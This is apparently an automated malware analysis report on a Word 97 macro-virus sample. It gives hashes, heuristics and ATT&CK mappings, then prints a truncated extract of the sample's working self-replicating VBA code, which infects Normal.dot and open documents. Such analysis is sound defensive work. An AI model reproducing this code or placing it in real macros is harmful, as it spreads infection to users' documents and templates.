Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f7c11e383e9c8ac0…

MALICIOUS

Office (OLE)

Size: 47.5 KB
Created: 1999-06-05 14:13:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 12f4be89b957e971b274fcbadd1e0856
SHA-1: efc1297213948593ed1eb364997ca1461816ac5c
SHA-256: f7c11e383e9c8ac0277e33019568398fa3952d8dcaf289357f689d1d3578bc74
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a Word 97 (Word 8.0) document whose VBA project carries an AutoOpen entry point, so the macro code runs as soon as the document is opened. The extracted module "matiz" is a self-replicating macro virus. MatizMe first locates its own code by scanning every VBComponent of NormalTemplate and of ActiveDocument for the line "Function MatizMe()" (ActiveHost); it then checks whether the other host is already infected (AmINormInstalled / AmIActInstalled) and, if not, reads its own lines out of the infected host's CodeModule and inserts them into the other host's CodeModule, creating a standard module and renaming it "Office_" when no suitable module exists. Note that the rename targets the default module name "Modul1", the German-locale default (English Word uses "Module1"); on other locales the rename fails silently under On Error Resume Next and that infection branch does nothing. Infecting the global template (Normal.dot) is what gives the code persistence: every document opened or created afterwards becomes a candidate host. On current Word versions this VBProject access is refused unless "Trust access to the VBA project object model" (the AccessVBOM setting) is enabled, which limits replication on a default configuration and means a dynamic sandbox may show no spreading at all. No registry Run key or Startup folder activity is visible in the extracted code; the persistence mechanism actually observed is Office template infection (ATT&CK T1137.001, Office Template Macros), so the T1547.001 mapping above should be read as tentative. Together with the heuristic firings and the ClamAV signature Doc.Trojan.Ami-1, this strongly indicates malicious activity, though the family was not independently confirmed beyond the signature name.

Heuristics (4)

  • ClamAV: Doc.Trojan.Ami-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ami-1
  • VBA macros detected [medium] (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project declares an AutoOpen procedure, which Word runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    Generic rule description: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this sample: a VBA project was in fact recovered (macros.bas under Extracted artifacts), so here the marker corroborates the OLE_VBA_AUTOOPEN finding rather than standing alone.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21,368 bytes
SHA-256: 16cf39f382d5e3d1f3bdb5ad3878da784f36f0421efb013b8b34bbabde824a04
Detection: ClamAV: Doc.Trojan.Ami-1
Obfuscation or payload: unlikely
Script preview
First 1,000 lines of the extracted VBA source (truncated below)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "matiz"
Function MatizMe()
On Error Resume Next

Set MyHost_ = MyHost
Set MyNewHost_ = MyNewHost
ActiveHost_ = ActiveHost

Set MyHost = Nothing
Set MyNewHost = Nothing


CheckRefNormal
CheckRefActive


If AmINormInstalled = False Then
    If CheckNormHost = False Then
        MyNewHost.Add (vbext_ct_StdModule)
        MyNewHost("Modul1").Name = "Office_"
        NormHostName_ = "Office_"
    Else
        NormHostName_ = NormHostName
    End If
    
    Our1Line% = Find1Line
    
    VirusLines% = (MyHost_(ActiveHost_).CodeModule.CountOfLines - Our1Line)
    VirusCode$ = MyHost_(ActiveHost_).CodeModule.Lines(Our1Line, VirusLines%)
    HostLines% = MyNewHost_(NormHostName_).CodeModule.CountOfLines
    MyNewHost(NormHostName_).CodeModule.InsertLines (HostLines% + 1), VirusCode$
    
End If
    
If AmIActInstalled = False Then
    If CheckDokHost = False Then
        MyNewHost.Add (vbext_ct_StdModule)
        MyNewHost("Modul1").Name = "Office_"
        DokHostName_ = "Office_"
    Else
        DokHostName_ = DokHostName
    End If
    
    Our1Line% = Find1Line
    
    VirusLines% = (MyHost_(ActiveHost_).CodeModule.CountOfLines - Our1Line)
    VirusCode$ = MyHost_(ActiveHost_).CodeModule.Lines(Our1Line, VirusLines%)
    HostLines% = MyNewHost_(DokHostName_).CodeModule.CountOfLines
    MyNewHost(DokHostName_).CodeModule.InsertLines (HostLines% + 1), VirusCode$

End If
End Function

Function MyHost() As Object

If MacroContainer = NormalTemplate Then Set MyHost = NormalTemplate.VBProject.VBComponents
If MacroContainer = ActiveDocument Then Set MyHost = ActiveDocument.VBProject.VBComponents

End Function

Function MyNewHost() As Object

If MacroContainer = NormalTemplate Then Set MyNewHost = ActiveDocument.VBProject.VBComponents
If MacroContainer = ActiveDocument Then Set MyNewHost = NormalTemplate.VBProject.VBComponents

End Function

Function ActiveHost() As String
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
         
    For iq = 1 To NormalTemplate.VBProject.VBComponents(i).CodeModule.CountOfLines
        If Left(NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(iq, 1), 18) = "Function MatizMe()" Then
            ActiveHost = NormalTemplate.VBProject.VBComponents(i).Name
            Exit Function
        End If
    Next iq
         
Next i

For j = 1 To ActiveDocument.VBProject.VBComponents.Count

    For icq = 1 To ActiveDocument.VBProject.VBComponents(j).CodeModule.CountOfLines
        If Left(ActiveDocument.VBProject.VBComponents(j).CodeModule.Lines(icq, 1), 18) = "Function MatizMe()" Then
            ActiveHost = ActiveDocument.VBProject.VBComponents(j).Name
            Exit Function
        End If
    Next icq
                          
Next j

End Function

Function AmINormInstalled() As Boolean

AmINormInstalled = False

For i = 1 To NormalTemplate.VBProject.VBComponents.Count

For iq = 1 To NormalTemplate.VBProject.VBComponents(i).CodeModule.CountOfLines
    If Left(NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(iq, 1), 18) = "Function MatizMe()" Then
        AmINormInstalled = True
        Exit Function
    End If
Next iq

Next i

End Function

Function AmIActInstalled() As Boolean

AmIActInstalled = False

For i = 1 To ActiveDocument.VBProject.VBComponents.Count

For icq = 1 To ActiveDocument.VBProject.VBComponents(i).CodeModule.CountOfLines
    If Left(ActiveDocument.VBProject.VBComponents(i).CodeModule.Lines(icq, 1), 18) = "Function MatizMe()" Then
        AmIActInstalled = True
        Exit Function
    End If
Next icq

Next i

End Function

Function CheckDokHost() As Boolean

CheckDokHost = False

CheckItem = ActiveDocument.VBProject.VBComponents.Count

If CheckItem > 1 Then
    For 
... (truncated)